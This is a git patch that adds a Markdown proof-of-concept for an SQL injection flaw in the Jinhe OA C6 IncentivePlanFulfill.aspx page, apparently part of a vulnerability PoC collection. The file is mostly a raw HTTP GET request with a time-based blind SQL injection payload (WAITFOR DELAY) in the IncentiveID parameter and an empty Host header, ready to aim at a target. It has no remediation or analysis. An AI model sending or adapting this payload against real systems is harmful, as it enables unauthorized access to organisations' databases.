From c273b2508cb1ac5be7a422b6d6e940e459f7d9a3 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 21 Mar 2024 17:57:57 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E9=87=91=E5=92=8COA-C6-IncentivePlanF?= =?UTF-8?q?ulfill.aspx=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md diff --git a/金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md b/金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..088aa83 --- /dev/null +++ b/金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md @@ -0,0 +1,12 @@ +## 金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞 + + +## poc +``` +GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1WAITFOR+DELAY+%270:0:6%27--&TVersion=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Connection: close +Cookie: ASP.NET_SessionId=0uha1u0nhrn4meghddjiwu0y +Accept-Encoding: gzip +```